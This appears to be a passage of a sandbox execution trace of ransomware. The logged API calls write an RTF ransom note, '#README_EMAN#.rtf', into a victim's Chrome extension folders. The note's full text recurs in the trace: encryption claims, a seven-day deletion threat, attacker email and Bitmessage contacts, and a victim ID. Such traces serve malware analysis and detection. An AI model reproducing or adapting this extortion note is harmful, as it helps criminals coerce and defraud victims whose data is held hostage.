s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.475] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.475] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.478] CloseHandle (hObject=0x2f0) returned 1 [0286.478] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0286.478] GetLastError () returned 0x2 [0286.478] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 